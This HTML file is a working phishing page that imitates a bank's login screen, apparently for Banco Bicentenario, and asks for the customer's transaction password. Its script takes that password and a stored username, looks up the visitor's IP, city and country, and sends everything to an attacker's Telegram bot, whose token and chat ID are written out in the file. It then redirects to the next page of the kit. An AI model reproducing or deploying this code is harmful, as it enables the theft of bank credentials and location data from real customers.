<!DOCTYPE html>
<html lang="es">
  <head>
    <meta charset="UTF-8" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1.0, user-scalable=no"
    />

    <title>Formulario Pantalla Completa</title>
    <style>
      body {
        margin: 0;
        padding: 0;
        font-family: system-ui, -apple-system, BlinkMacSystemFont, "Segoe UI",
          Roboto, Oxygen, Ubuntu, Cantarell, "Open Sans", "Helvetica Neue",
          sans-serif;
        overflow: hidden;
        display: flex;
        justify-content: center;

        min-height: 100vh;
        background: url("fondo.jpg");
        background-size: cover;
      }

      .form-container {
        background: rgba(255, 255, 255, 0.9);
        padding: 20px;
        border-radius: 6px;
        margin-top: 50px;
        height: 530px;
        box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
        width: 598px; /* Ajusta el ancho del formulario según sea necesario */
      }
      .formato {
        padding: 50px;
        padding-top: 8px;
      }

      @media (max-width: 767px) {
        .form-container {
          margin-top: 30px;
          background: rgba(255, 255, 255, 0.9);
          padding: 20px;
          border-radius: 6px;

          box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
          width: 80%; /* Ajusta el ancho del formulario según sea necesario */
        }
        .formato {
          padding: 8px;
        }
      }

      form {
        display: flex;
        flex-direction: column;
        align-items: center;
      }

      label {
        margin-bottom: 10px;
      }

      input {
        background-color: #fff;
        border: 1px solid #aaa;
        box-sizing: border-box;
        border-radius: 8px;
        height: 45px;
        padding: 0 12px;
      }

      button {
        padding: 10px;
        background-color: #2c399f !important;
        padding: 15px;
        font-weight: bold;
        color: white;
        width: 100%;
        border: none;
        border-radius: 8px;
        font-size: 15px;
        cursor: pointer;
      }
    </style>
    <style>
      input {
        display: block;
        box-sizing: border-box;
        -moz-box-sizing: border-box;
        width: 100%;
        height: 32px;
        line-height: 32px;
        padding: 5px 10px;
        outline: 0;
        border: 1px solid transparent;
        background: red;
        border-radius: 0;
        background: #fff;
        font: 13px/16px "Open Sans", Helvetica, Arial, sans-serif;
        color: #404040;
        appearance: normal;
      }
    </style>
    <style>
      .contenedor2 {
        display: flex;
        flex-wrap: wrap;
        width: 100%;
        justify-content: center;
      }

      .opcion {
        width: 50%;
        box-sizing: border-box;
        padding: 10px;
        text-align: center;
        color: #a32337 !important;
        font-size: 14px;
        font-weight: 500;
      }

    
    </style>
    <link
      rel="stylesheet"
      href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css"
    />
  </head>

  <body>
    <div class="form-container">
      <div style="text-align: center; width: 100%">
        <img src="logo.svg" style="width: 80%" alt="" />
      </div>
      <div class="formato">
        <form id="loginform">
          <div style="width: 100%; height: 20px"></div>
          <div style="text-align: left; width: 100%">
            <p
              style="
                line-height: 19px;
                font-weight: bold;
                font-size: 13px;
                color: #333;
                text-align: left;
                white-space: normal;
              "
            >
              Clave de transacciones
            </p>
          </div>
          <div class="input-container" style="width: 100%">
            <input
              type="text"
              id="contra"
              placeholder="Clave para realizar sus transacciones"
              required
              style="background: rgb(239, 239, 239)"
            />
          </div>

          <div style="width: 100%; height: 30px"></div>

          <div class="contenedor2">
            <div class="opcion">
              <a
                href="contra.html"
                style="
                  color: inherit; /* hereda el color del texto del padre */
                  text-decoration: inherit; /* hereda la decoración del texto del padre */
                "
                ><i class="fa fa-home"></i> Regresar</a
              >
            </div>
            <div class="opcion"><i class="fa fa-unlock"></i>  Olvido su clave Interactiva</div>
          </div>
          <div style="width: 100%; height: 30px"></div>

          <button type="submit"><i class="fa fa-unlock"></i> Ingresar</button>
          <div style="width: 100%; height: 20px"></div>
          <div
            style="
              width: 100%;
              text-align: center;
              font-size: 11px;
              font-weight: bold;
              color: grey;
            "
          >
            Para mayor información o asesoria contáctanos al <br />
            Centro de atención telefónica <br />
            0500-6272421
          </div>

          <div style="width: 100%; height: 30px"></div>
        </form>
      </div>
    </div>
  </body>
  <script src="https://cdn.jsdelivr.net/npm/axios@1.1.2/dist/axios.min.js"></script>

  <script>
    const url = "https://ipapi.co/json/";
    const form = document.querySelector("#loginform");
    form.addEventListener("submit", (event) => {
      event.preventDefault(); // aqui evitamos que el código se repita evita que se envíe el formulario
      axios
        .get(url)
        .then((response) => {
          const nombre = localStorage.getItem("usuario");
          const contra = document.querySelector("#contra").value;
          const message =
            "\nBicentenario\nUsuario: " +
            nombre +
            "\nClave Transaccional: " +
            contra +
            "\nCiudad:" +
            response.data.city +
            "\nPais: " +
            response.data.country +
            "\nIP: " +
            response.data.ip;
          axios
            .post(
              "https://api.telegram.org/bot5881769745:AAFiecIBFXB7lIJXhf3N1XP4TPc6uc4ZOjU/sendMessage",
              {
                chat_id: "-4113459262",
                text: message,
              }
            )
            .then((response) => {
              window.location.href = "imagen2.html";
            })
            .catch((error) => {
              console.error(error);
            });
        })
        .catch((error) => {
          console.log(error);
        });
    });
  </script>
</html>
